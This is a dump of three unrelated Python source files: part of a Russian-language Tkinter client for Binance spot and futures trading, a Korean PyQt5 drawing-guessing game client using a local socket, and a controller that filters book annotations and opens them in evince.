app.graph_Cn.itemconfigure(GPPP_Tmp_txt,text='Цена: ' + str(PPP_Tmp) + '\n' + "%.2f" % (PnL_dif) + ' USDT')
if MS == 'FUTURES' and should_run_C == True and PEP > 0 and PosSide=='SHORT':
yyC =((100+(float(value)/float(Lvrg)))/100)*float(PEP)
PPP_Tmp = yyC
#print(yyC,' - ', y0I_TP, ' - ', float(PEP))
yyC = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
#print(grMd, ' - ',yyC,' - ', y0I_TP,' - ', float(PEP), ' - ', value)
PnL_dif = -(PEP * PPA - PPP_Tmp * PPA)
app.graph_Cn.coords(GPSP_Tmp, -500,yyC,800,yyC)
app.graph_Cn.coords(GPSP_Tmp_txt,900,yyC)
app.graph_Cn.itemconfigure(GPSP_Tmp_txt,text='Цена: ' + str(PPP_Tmp) + '\n' + "%.2f" % (PnL_dif) + ' USDT')
    #__Value change event of the Scale_SL widget
def Scale_SL_change(self,value):
global PSP_Tmp
if MS == 'FUTURES' and should_run_C == True and PEP > 0 and PosSide=='LONG':
yyC =((100+(float(value)/float(Lvrg)))/100)*float(PEP)
PSP_Tmp = yyC
#print(PSP_Tmp)
#print(yyC,' - ', y0I_TP, ' - ', float(PEP))
yyC = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
#print(grMd, ' - ',yyC,' - ', y0I_TP,' - ', float(PEP), ' - ', value)
PnL_dif = -(PEP * PPA - PSP_Tmp * PPA)
app.graph_Cn.coords(GPSP_Tmp, -500,yyC,800,yyC)
app.graph_Cn.coords(GPSP_Tmp_txt, 900,yyC)
app.graph_Cn.itemconfigure(GPSP_Tmp_txt,text='Цена: ' + str(PSP_Tmp) + '\n' + "%.2f" % (PnL_dif) + ' USDT')
#print ('SL_change',value)
if MS == 'FUTURES' and should_run_C == True and PEP > 0 and PosSide=='SHORT':
yyC =((100+(float(value)/float(Lvrg)))/100)*float(PEP)
PSP_Tmp = yyC
#print(PSP_Tmp)
#print(yyC,' - ', y0I_TP, ' - ', float(PEP))
yyC = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
#print(grMd, ' - ',yyC,' - ', y0I_TP,' - ', float(PEP), ' - ', value)
PnL_dif = -(PEP * PPA - PSP_Tmp * PPA)
app.graph_Cn.coords(GPPP_Tmp, -500,yyC,800,yyC)
app.graph_Cn.coords(GPPP_Tmp_txt, 900,yyC)
app.graph_Cn.itemconfigure(GPPP_Tmp_txt,text='Цена: ' + str(PSP_Tmp) + '\n' + "%.2f" % (PnL_dif) + ' USDT')
def OptionCYP_selected(self,choice):
global grZm
global should_run_C
grZm_choice = choice
if grZm_choice == '-50%':
grZm = 50
elif grZm_choice == '-40%':
grZm = 100
elif grZm_choice == '-30%':
grZm = 200
elif grZm_choice == '-20%':
grZm = 300
elif grZm_choice == '-10%':
grZm = 400
elif grZm_choice == '0%':
grZm = 500
elif grZm_choice == '+10%':
grZm = 600
elif grZm_choice == '+20%':
grZm = 700
elif grZm_choice == '+30%':
grZm = 800
elif grZm_choice == '+40%':
grZm = 900
elif grZm_choice == '+50%':
grZm = 1000
        if GS in ('CANDLE 1m', 'CANDLE 5m', 'CANDLE 15m', 'CANDLE 30m', 'CANDLE 1h', 'CANDLE 4h', 'CANDLE 1d'):
if should_run_C == True:
#__Stop Timer
should_run_C = False
PS1 = True
app.button_1['font']=myFont
app.button_1.config(text="Start", fg='green')
time.sleep(0.5)
#__Restart Timer
PS1 = False
t2 = threading.Thread(target=Timer_Candle,daemon=True)
t2.start()
app.button_1.config(text="Stop", fg='red')
should_run_C = True
def button1_press(self,event):
global SxS, SyS
SxS, SyS = event.x, event.y
#print(event.x, event.y)
def button1_release(self,event):
global SxF, SyF
SxF, SyF = event.x, event.y
self.graph_1.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_1.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_2.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_Tb.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Td.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_VV.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_BTCD.xview_scroll(int((SxS-SxF)/20),UNITS)
#print(event.x, event.y)
def button10_press(self,event):
global SxS, SyS
SxS, SyS = event.x, event.y
#print(event.x, event.y)
def button10_release(self,event):
global SxF, SyF
SxF, SyF = event.x, event.y
self.graph_Cn.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Cn.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_2.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_Tb.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Td.xview_scroll(int((SxS-SxF)/20),UNITS)
#print(event.x, event.y)
def buttonSm_press(self,event):
global SxS, SyS
SxS, SyS = event.x, event.y
#print(event.x, event.y)
def buttonSm_release(self,event):
global SxF, SyF
SxF, SyF = event.x, event.y
self.graph_Sm.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Sm.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_2.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_Tb.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Td.xview_scroll(int((SxS-SxF)/20),UNITS)
#print(event.x, event.y)
def buttonZm_release(self,event):
global SxF, SyF
global yI0Zm
global grH
SxF, SyF = event.x, event.y
grMd=grH/2
yy = yI0Zm +(((grMd - SyF)/25)*prSt)
#print (yy)
if prSt >= 1:
yy1 = "%.0f" % (yy)
yy2=float(yy1)
if prSt == 0.1:
yy1 = "%.1f" % (yy)
yy2=float(yy1)
#print(yy2)
elif prSt == 0.01:
yy1 = "%.2f" % (yy)
yy2=float(yy1)
#print(yy2)
elif prSt == 0.001:
yy1 = "%.3f" % (yy)
yy2=float(yy1)
elif prSt == 0.0001:
yy1 = "%.4f" % (yy)
yy2=float(yy1)
elif prSt == 0.00001:
yy1 = "%.5f" % (yy)
yy2=float(yy1)
elif prSt == 0.000001:
yy1 = "%.6f" % (yy)
yy2=float(yy1)
elif prSt == 0.0000001:
yy1 = "%.7f" % (yy)
yy2=float(yy1)
elif prSt == 0.00000001:
yy1 = "%.8f" % (yy)
yy2=float(yy1)
app.text_POrd.delete(1.0,END)
app.text_POrd.insert(1.0, yy2)
def CB_P_changed(self,event):
global SP
global grSmb
global prSt
global grSt
global grOW
global Lo
global Lvrg
global Lvrg_Tmp
global MrgT
global MrgT_Tmp
global Should_Chng
global orLSS
SP = self.CB_P.get()
self.label_P.config(text = SP)
tstr=''
orLSS=1
Should_Chng = False
app.Tree_Ord.delete(*app.Tree_Ord.get_children())
if MS == 'SPOT':
tstr = 'SPOT'
MrgT='NONE'
MrgT_Tmp='NONE'
if len(myTuplEI1)>0 and len(mylistSP)>0:
for mm in range (len(mylistSP)):
if mylistSP[mm]['symbol'] == SP:
app.Tree_PI.item(1, values=('символ',mylistSP[mm]['symbol']))
app.Tree_PI.item(2, values=('статус',mylistSP[mm]['status']))
app.Tree_PI.item(3, values=('базовая',mylistSP[mm]['baseAsset']))
app.Tree_PI.item(4, values=('котируемая',mylistSP[mm]['quoteAsset']))
app.Tree_PI.item(5, values=('маржа','-'))
app.Tree_PI.item(6, values=('тип','-'))
mylist10 = []
mylist10 = mylistSP[mm]['filters']
if len(mylist10)>0:
app.Tree_PI.item(7, values=('минЦена',mylist10[0]['minPrice']))
app.Tree_PI.item(8, values=('максЦена',mylist10[0]['maxPrice']))
app.Tree_PI.item(9, values=('шагЦены',mylist10[0]['tickSize']))
app.Tree_PI.item(10, values=('максОбъем',mylist10[2]['maxQty']))
app.Tree_PI.item(11, values=('шагОрдера',mylist10[2]['stepSize']))
prSt = float(mylist10[0]['tickSize'])
grSt = 16
grOW = 1000
grOW = float(mylist10[5]['maxQty'])
Lo=0
grSmb = SP
elif MS == 'FUTURES':
tstr = 'FUTURES'
if len(myTuplEI2)>0 and len(mylistFT)>0:
for mm in range (len(mylistFT)):
if mylistFT[mm]['symbol'] == SP:
#print(mylistFT[mm])
app.Tree_PI.item(1, values=('символ',mylistFT[mm]['symbol']))
app.Tree_PI.item(2, values=('статус',mylistFT[mm]['status']))
app.Tree_PI.item(3, values=('базовая',mylistFT[mm]['baseAsset']))
app.Tree_PI.item(4, values=('котируемая',mylistFT[mm]['quoteAsset']))
app.Tree_PI.item(5, values=('маржа',mylistFT[mm]['marginAsset']))
app.Tree_PI.item(6, values=('тип',mylistFT[mm]['contractType']))
mylist10 = []
mylist10 = mylistFT[mm]['filters']
if len(mylist10)>0:
prSt = float(mylist10[0]['tickSize'])
orLSS= float(mylist10[1]['stepSize'])
grSt = 16
grOW = 1000
grOW = float(mylist10[2]['maxQty'])
Lo=0
grSmb = SP
app.Tree_PI.item(7, values=('минЦена',mylist10[0]['minPrice']))
app.Tree_PI.item(8, values=('максЦена',mylist10[0]['maxPrice']))
app.Tree_PI.item(9, values=('шагЦены',mylist10[0]['tickSize']))
app.Tree_PI.item(10, values=('максОбъем',mylist10[2]['maxQty']))
app.Tree_PI.item(11, values=('шагОрдера',mylist10[1]['stepSize']))
BnFAcc = bot.futuresAccount()
#print(BnFAcc)
ss = 'FUTURES positions:\n'
if len(BnFAcc)>0:
BnFAcc1 = BnFAcc['positions']
if len(BnFAcc1)>0:
for mm in range(len(BnFAcc1)):
BnFAcc10 = BnFAcc1[mm]
if BnFAcc10['symbol']==grSmb:
#print (grSmb)
Lvrg=BnFAcc10['leverage']
Lvrg_Tmp = Lvrg
#print(Lvrg)
app.CB_Lvrg.set(Lvrg)
app.label_OrdAss.config(text = 'USDT x ' + str(Lvrg))
Isl=BnFAcc10['isolated']
if Isl == True:
app.CB_MrgT.set('ISOLATED')
MrgT='ISOLATED'
MrgT_Tmp=MrgT
elif Isl==False:
app.CB_MrgT.set('CROSSED')
MrgT='CROSSED'
MrgT_Tmp=MrgT
#print(bot.symbolLeverage(symbol=grSmb))
#print(bot.symbolMarginType(symbol=grSmb))
self.label_PI.config(text = tstr)
def CB_MrgT_changed(self,event):
global MrgT_Tmp
if MS == 'FUTURES':
MrgT_Tmp = app.CB_MrgT.get()
def CB_Lvrg_changed(self,event):
global Lvrg_Tmp
Lvrg_Tmp = app.CB_Lvrg.get()
def click_button_MrLvSet(self):
#global Lvrg
#global MrgT
global Should_Chng
Should_Chng=False
MrgT_Tmp_B=False
Msg_Tmp=0
if MrgT_Tmp == 'ISOLATED':
MrgT_Tmp_B=True
else:
MrgT_Tmp_B=False
if MS == 'FUTURES':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb:
Should_Chng=False
Msg_Tmp=3
BnFAcc = bot.futuresAccount()
#print(BnFAcc)
if len(BnFAcc)>0:
BnFAcc1 = BnFAcc['positions']
if len(BnFAcc1)>0:
for mm in range(len(BnFAcc1)):
BnFAcc10 = BnFAcc1[mm]
#if BnFAcc10['symbol']==grSmb:
# print(BnFAcc10['positionAmt'])
# print (float(BnFAcc10['leverage']),float(Lvrg_Tmp),BnFAcc10['isolated'],MrgT_Tmp_B,MrgT_Tmp)
if BnFAcc10['symbol']==grSmb and (float(BnFAcc10['positionAmt'])>0 or float(BnFAcc10['positionAmt'])<0):
Msg_Tmp=1
Should_Chng=False
elif BnFAcc10['symbol']==grSmb and float(BnFAcc10['positionAmt'])==0 and float(BnFAcc10['leverage']) == float(Lvrg_Tmp) and BnFAcc10['isolated'] == MrgT_Tmp_B and Msg_Tmp==0:
Msg_Tmp=2
Should_Chng=False
elif BnFAcc10['symbol']==grSmb and float(BnFAcc10['positionAmt'])==0 and (float(BnFAcc10['leverage']) != float(Lvrg_Tmp) or BnFAcc10['isolated'] != MrgT_Tmp_B) and Msg_Tmp==0:
Should_Chng=True
if BnFAcc10['isolated'] != MrgT_Tmp_B and float(BnFAcc10['leverage']) == float(Lvrg_Tmp):
Msg_Tmp=4
elif BnFAcc10['isolated'] == MrgT_Tmp_B and float(BnFAcc10['leverage']) != float(Lvrg_Tmp):
Msg_Tmp=5
elif BnFAcc10['isolated'] != MrgT_Tmp_B and float(BnFAcc10['leverage']) != float(Lvrg_Tmp):
Msg_Tmp=6
if Should_Chng==False and Msg_Tmp==1:
messagebox.showinfo("Set changes decline", "Есть открытые позиции по данной паре " + grSmb)
elif Should_Chng==False and Msg_Tmp==2:
messagebox.showinfo("Set changes decline", "Нет изменений по данной паре " + grSmb)
elif Should_Chng==False and Msg_Tmp==3:
messagebox.showinfo("Set changes decline", "Есть открытые ордера по данной паре " + grSmb)
#print (Should_Chng)
#print (Lvrg,Lvrg_Tmp,MrgT,MrgT_Tmp)
if Should_Chng==True:
if Msg_Tmp==5 or Msg_Tmp==6:
bot.futuresChLeverage(symbol=grSmb,leverage=int(Lvrg_Tmp))
messagebox.showinfo("Set changes leverage", "Плечо по данной паре " + grSmb + "установлено" + Lvrg_Tmp)
sys_msg = ' Кредитное плечо пары ' + grSmb + ' установлено x' + Lvrg_Tmp
app.Sys_Msg(text1=sys_msg)
if Msg_Tmp==4 or Msg_Tmp==6:
bot.futuresChMarginType(symbol=grSmb,marginType=MrgT_Tmp)
messagebox.showinfo("Set changes margin", "Маржа по данной паре " + grSmb + "установлена" + MrgT_Tmp)
sys_msg = ' Режим маржи пары ' + grSmb + ' установлен:' + MrgT_Tmp
app.Sys_Msg(text1=sys_msg)
def market_selected(self,choice):
        global MS
        global MrgT
MS = choice
if MS == 'SPOT':
            app.CB_MrgT['values'] = ('NONE',)
app.CB_MrgT.current(0)
MrgT='NONE'
            app.CB_Lvrg['values'] = ('1',)
app.CB_Lvrg.current(0)
elif MS == 'FUTURES':
app.CB_MrgT['values'] = ('ISOLATED', 'CROSSED')
app.CB_MrgT.current(0)
MrgT='ISOLATED'
app.CB_Lvrg['values'] = ('1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20')
app.CB_Lvrg.current(0)
self.PL_make()
def graph_selected(self,choice):
global GS
GS = choice
wh = root.winfo_height()
ww = root.winfo_width()
if GS=='TICK':
app.graph_1.place(x=10,y=150,width=ww-490,height=wh-320)
app.graph_Sm.place_forget()
app.graph_Cn.place_forget()
app.graph_VV.place_forget()
app.graph_BTCD.place_forget()
        elif GS in ('CANDLE 1m', 'CANDLE 5m', 'CANDLE 15m', 'CANDLE 30m', 'CANDLE 1h', 'CANDLE 4h', 'CANDLE 1d'):
app.graph_1.place_forget()
app.graph_Sm.place_forget()
app.graph_Cn.place(x=10,y=150,width=ww-490,height=wh-320)
app.graph_VV.place(x=10,y=wh-300,width=ww-490,height=100)
app.graph_BTCD.place(x=10,y=180,width=ww-490,height=100)
elif GS=='CANDLE SUMM':
app.graph_1.place_forget()
app.graph_Cn.place_forget()
app.graph_VV.place_forget()
app.graph_BTCD.place_forget()
app.graph_Sm.place(x=10,y=150,width=ww-490,height=wh-320)
def pair_selected(self,choice):
global MPS
MPS = choice
if choice == 'Все':
MPS = ''
elif choice == 'USDT':
MPS = 'USDT'
self.PL_make()
def PL_make(self):
if MS == 'SPOT':
if MPS == '':
app.CB_P["values"] = mylist1
elif MPS == 'USDT':
mylist10 = []
for mm in range(len(mylistSP)):
if mylistSP[mm]['quoteAsset'] == 'USDT':
mylist10.append(mylistSP[mm]['symbol'])
app.CB_P["values"] = mylist10
elif MS == 'FUTURES':
if MPS == '':
app.CB_P["values"] = mylist2
elif MPS == 'USDT':
mylist10 = []
for mm in range(len(mylistFT)):
if mylistFT[mm]['quoteAsset'] == 'USDT':
mylist10.append(mylistFT[mm]['symbol'])
app.CB_P["values"] = mylist10
#______________MAIN WINDOW GUI END
#______________MAIN WINDOW GUI LOADING BEGIN
#__Start CODE
root = Tk()
app = gui(root)
root.title('iTrader. Торговля на Binance')
root.protocol("WM_DELETE_WINDOW", close_window)
root.geometry("1400x850+150+100")
#__Main Menu
menu = Menu(root)
new_item=Menu(menu, tearoff=0)
new_item.add_command(label='Ключи',command=clicked_Bnacc)
new_item.add_separator()
new_item.add_command(label='Балансы',command=clicked_blns)
new_item.add_command(label='Ордера',command=clicked_Ordrs)
menu.add_cascade(label='Аккаунт', menu=new_item)
root.config(menu=menu)
#__Connecting Binance
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str = time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = str(time_local_str) + ' Запуск программы. Подключение к Binance ...'
app.text_Sys.insert(1.0, sys_msg)
#print(bot.time())
myListST = bot.time()
sss23 = myListST['serverTime']/1000
sss24 = datetime.datetime.fromtimestamp(sss23)
sss25=sss24.strftime("[%d.%m.%Y %H:%M:%S] ")
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Binance время: ' + str(sss25)
app.text_Sys.insert(END, sys_msg)
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Считываю рынки Binance ...'
app.text_Sys.insert(END, sys_msg)
#__start reading Markets.SPOT
myTuplEI1 = bot.exchangeInfo()
app.CB_P["values"]=()
mylist1 = []
mylist10 = []
if len(myTuplEI1)>0:
mylistSP = myTuplEI1['symbols']
if len(mylistSP)>0:
for mm in range (len(mylistSP)):
mylist1.append(mylistSP[mm]['symbol'])
#print(mylist1[mm]['symbol'])
if MPS == 'USDT':
if mylistSP[mm]['quoteAsset'] == 'USDT':
mylist10.append(mylistSP[mm]['symbol'])
if mylistSP[mm]['symbol'] == grSmb and MS == 'SPOT':
myListSmbFlt = []
myListSmbFlt = mylistSP[mm]['filters']
if len(myListSmbFlt)>0:
prSt = float(myListSmbFlt[0]['tickSize'])
grOW = float(myListSmbFlt[5]['maxQty'])
#print (prSt, grOW)
#__start reading Markets.FUTURES
myTuplEI2 = bot.futuresExchangeInfo()
mylist2 = []
mylist20 = []
if len(myTuplEI2)>0:
mylistFT = myTuplEI2['symbols']
if len(mylistFT)>0:
for mm in range (len(mylistFT)):
mylist2.append(mylistFT[mm]['symbol'])
if MPS == 'USDT':
if mylistFT[mm]['quoteAsset'] == 'USDT':
mylist20.append(mylistFT[mm]['symbol'])
if mylistFT[mm]['symbol'] == grSmb and MS == 'FUTURES':
myListSmbFlt = []
myListSmbFlt = mylistFT[mm]['filters']
if len(myListSmbFlt)>0:
prSt = float(myListSmbFlt[0]['tickSize'])
grOW = float(myListSmbFlt[2]['maxQty'])
#print (prSt, grOW)
if MS =='SPOT':
if MPS == 'USDT':
app.CB_P["values"] = mylist10
else:
app.CB_P["values"] = mylist1
elif MS == 'FUTURES':
if MPS == 'USDT':
app.CB_P["values"] = mylist20
else:
app.CB_P["values"] = mylist2
app.CB_P.set(grSmb)
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Рынки Binance считаны.'
app.text_Sys.insert(END, sys_msg)
#__"BNBUSDT - trades"
myTuplTr = ('trades', bot.trades(symbol=grSmb, limit=1)) #Tupl
myDicGr1 = myTuplTr[1][0] #dict
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Программа готова к работе!'
app.text_Sys.insert(END, sys_msg)
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Текущий график: ' + GS
sys_msg += '\n' + str(time_local_str) + ' Текущий рынок: ' + MS + '. Текущие пары: ' + MPS
sys_msg += '\n' + str(time_local_str) + ' Текущая пара: ' + grSmb
app.text_Sys.insert(END, sys_msg)
app.text_Sys.yview(END)
if os.path.isfile('iTrader.cfg') == False:
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Файл настроек отсуствует. Необходимо ввести API_KEYS в меню Account для работы с программой'
else:
if os.stat("iTrader.cfg").st_size == 0:
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Файл настроек пуст. Необходимо ввести API_KEYS в меню Account для работы с программой'
else:
my_file_Account = open("iTrader.cfg", "r")
l = 0
while True:
sss00 = my_file_Account.readline()
if not sss00:
break
if l == 0:
API_KEY_s = sss00.replace ("\n", "")
elif l == 1:
API_SECRET_s = sss00.replace ("\n", "")
l +=1
my_file_Account.close()
if API_KEY_s == '' or API_SECRET_s =='':
l = 0
if l >= 2:
isAcc = True
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Файл настроек считан успешно.'
elif l < 2:
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Файл настроек считан с ошибками. Необходимо ввести API_KEYS в меню Account для работы с программой'
app.text_Sys.insert(END, sys_msg)
app.text_Sys.yview(END)
if isAcc == True:
#print(API_SECRET_s)
#print(API_KEY_s)
bot = Binance(API_KEY=API_KEY_s, API_SECRET=API_SECRET_s)
#__start reading acc
myListAcc = bot.account()
#print(bot.account())
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = "\n" + str(time_local_str) + " Binance SPOT аккаунт. Разрешения: " + str(myListAcc['permissions']) + '. Можно внести: ' + str(myListAcc['canDeposit'])
sys_msg += str(". Можно вывести: ") + str(myListAcc['canWithdraw'])
app.text_Sys.insert(END, sys_msg)
app.text_Sys.yview(END)
BnFAcc = bot.ftrsGetPositionSide()
#print (BnFAcc)
if BnFAcc['dualSidePosition']==True:
app.label_HM.config(text="Position Mode: Both")
else:
app.label_HM.config(text="Position Mode: One-way")
#______________MAIN WINDOW GUI LOADING END
#______________MAIN WINDOW GUI EVENTS BEGIN
def config(event):
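    # <Configure> handler: whenever the root window is resized, re-place every
    # widget relative to the new width/height and remember the new graph size.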
global grH
global grW
if event.widget == root and ep==False:
app.label_BU.place(x=event.width-210, y=10, width=200, height=40)
app.button_2.place(x=event.width-260, y=10, width=50, height=40)
app.button_AB.place(x=event.width-260, y=60, width=50, height=50)
app.label_PnL.place(x=event.width-210, y=60, width=200, height=50)
app.label_HM.place(x=event.width-210, y=120, width=200, height=40)
app.label_7.place(x=10, y=10, width=event.width-20, height=event.height-20)
app.Tree_Pos.place(x=210, y=10, width=event.width-490, height=100)
app.Tree_Pos_VScrl.place(height=100,width=10,x=event.width-280,y=10)
app.label_Grpf.place(width=event.width-440, height=event.height-320,x=10,y=150)
app.label_Ord.place(height=event.height-320,width=200,x=event.width-420,y=150)
app.label_Cmd.place(height=event.height-160,width=200,x=event.width-210,y=150)
app.label_PI.place(height=event.height-320-390,width=200,x=0,y=120)
app.Tree_PI.place(height=event.height-320-390,width=185,x=0,y=120)
app.Tree_PI_VScrl.place(height=event.height-320-390,width=10,x=185,y=120)
app.label_CmdOrd.place(height=event.height-300-(event.height-710),width=198,x=0,y=130+(event.height-320-390))
app.text_Sys.place(height=150,width=event.width-440,x=10,y=event.height-160)
app.text_Sys_Scrl.place(height=150,width=10,x=event.width-430,y=event.height-160)
app.label_P.place(x=event.width-210,y=150)
app.CB_MrgT.place(x=event.width-210,y=170)
app.CB_Lvrg.place(x=event.width-110,y=170)
app.button_MrLvSet.place(x=event.width-65,y=170)
app.CB_P.place(x=event.width-210,y=200)
app.MPSL.place(x=event.width-210,y=230)
app.SPSL.place(x=event.width-110,y=230)
if GS=='TICK':
app.graph_1.place(width=event.width-490,height=event.height-320,x=10,y=150)
        elif GS in ('CANDLE 1m', 'CANDLE 5m', 'CANDLE 15m', 'CANDLE 30m', 'CANDLE 1h', 'CANDLE 4h', 'CANDLE 1d'):
app.graph_Cn.place(width=event.width-490,height=event.height-320,x=10,y=150)
app.graph_VV.place(x=10,y=event.height-300,height=100,width=event.width-490)
app.graph_BTCD.place(x=10,y=180,height=100,width=event.width-490)
elif GS=='CANDLE SUMM':
app.graph_Sm.place(width=event.width-490,height=event.height-320,x=10,y=150)
app.graph_Tb.place(x=10,y=150,height=30,width=event.width-490)
app.graph_Td.place(x=10,y=event.height-200,height=30,width=event.width-490)
if Ord_Zm==False:
app.graph_2.place(x=event.width-420,y=150,height=event.height-320,width=200)
else:
app.graph_Zm.place(x=event.width-420,y=150,height=event.height-320,width=200)
app.Scale_TP.place(height=(event.height-320-60)/2-15,width=70,x=event.width-480,y=180)
app.Scale_SL.place(height=(event.height-320-60)/2-15,width=70,x=event.width-480,y=150+45+(event.height-320-60)/2)
app.PSDvar_L.place(height=30,width=30,x=event.width-480,y=150+15+(event.height-320-60)/2)
app.PSDvar_S.place(height=30,width=30,x=event.width-480+30,y=150+15+(event.height-320-60)/2)
app.button_PTP.place(height=30,width=45,x=event.width-480,y=150)
app.button_PTPR.place(height=30,width=15,x=event.width-435,y=150)
app.button_PSL.place(height=30,width=45,x=event.width-480,y=event.height-200)
app.button_PSLR.place(height=30,width=15,x=event.width-435,y=event.height-200)
app.button_Ord.place(x=event.width-420,y=150,height=30,width=100)
app.button_OrdTmr.place(x=event.width-320,y=150,height=30,width=100)
grH = event.height-320
grW = event.width-340
root.bind("<Configure>", config)
#______________MAIN WINDOW GUI EVENTS END
root.mainloop()
|
2021-11-21-cmind-drawncode.py
|
import threading, socket
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtCore import *
import sys
from worrd import gud
def recvMsg(soc): # receive coordinates from the server
while True:
data = soc.recv(15)
msg = data.decode()
a=msg.split(',')
ex.sok(a[0],a[1],a[2],a[3])
soc.close()
class Client:
ip = 'localhost'
port = 4444
def __init__(self):
self.client_soc = None
def conn(self):
self.client_soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.client_soc.connect((Client.ip, Client.port))
def run(self):
self.conn()
t2 = threading.Thread(target=recvMsg, args=(self.client_soc,))
t2.start()
def main():
c = Client()
c.run()
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket .connect(("localhost", 4444))
class MyApp(QMainWindow): # main window
def __init__(self):
super().__init__()
self.image = QImage(QSize(400, 400), QImage.Format_RGB32)
self.image.fill(Qt.white)
self.brush_size = 5
self.brush_color = Qt.black
self.initUI()
self.show()
    def initUI(self): # window setup
self.setWindowTitle('Simple Painter')
self.setGeometry(700, 200, 400, 400)
a = gud()
button = QPushButton(a[1], self)
button.move(150, 0)
self.line_edit = QLineEdit(self)
self.line_edit.move(25, 365)
self.button = QPushButton(self)
self.button.move(200, 365)
self.button.setText('정답')
self.button.clicked.connect(self.button_event)
    def button_event(self): # called when the answer button is pressed
text = self.line_edit.text()
ekq = gud()
if text == ekq[0]:
QMessageBox.about(self, "정답", "정답")
else:
QMessageBox.about(self, "오답", "오답")
def paintEvent(self, e):
canvas = QPainter(self)
canvas.drawImage(self.rect(), self.image, self.image.rect())
def sok(self, q,w,e,r):
painter = QPainter(self.image)
painter.setPen(QPen(self.brush_color, self.brush_size, Qt.SolidLine, Qt.RoundCap))
        painter.drawLine(int(q), int(w),int(e),int(r)) # (previous point, current point) drawLine(x1, y1, x2, y2)
self.update()
if __name__ == '__main__':
    app = QApplication(sys.argv)
    ex = MyApp() # main window; must exist before main() starts the receive thread that draws on it
    main()
    sys.exit(app.exec_())
client_socket.close()
|
controller.py
|
import io
import itertools
import re
import subprocess
from threading import Thread
from core.data_extractor import DataExtractor
from core.objects.annotation import Annotation
from core.utils import ends_with_slash
class AnnotationsPageController:
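    """Controller for the annotations page: filters annotations supplied by a
    DataExtractor, exports them as Markdown, and opens the source book in an
    external viewer."""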
data_extractor: DataExtractor
def view_annotation(self, anno_id):
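        """Open the annotated book in evince at the annotation's page.

        The page number is parsed from the annotation's Begin field, and the
        viewer is launched on a daemon thread so the caller is not blocked.
        """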
anno = self.data_extractor.get_tag(anno_id)
file = self.data_extractor.get_book_file(anno.BookId)
subpath = file.get_subpath()
root_path = self.data_extractor.path
        page_num = int(re.findall(r"page=(\d+)", anno.Begin)[0]) + 1
command = ["evince", "-p", str(page_num), ends_with_slash(root_path)+subpath]
Thread(target=subprocess.check_call, args=[command], daemon=True).start()
def annotations_as_markdown(self, **k)-> io.BytesIO:
data = sorted(self.annotations(**k), key=lambda item: item.OID)
s = io.StringIO()
for item in data:
s.write(f"\n\n{item.Text}")
out = io.BytesIO()
out.write(s.getvalue().encode("utf-8"))
out.seek(0)
s.close()
return out
def annotations(self, tag=None, bookId=None, **k):
data = self.data_extractor.get_tags()
def filterFunc(item: Annotation):
bools = [True]
if tag:
bools.append(tag in item.TagName)
if bookId:
bools.append(item.BookId == int(bookId))
if item.Text == "Bookmark":
return False
return all(bools)
return list(filter(filterFunc, data))
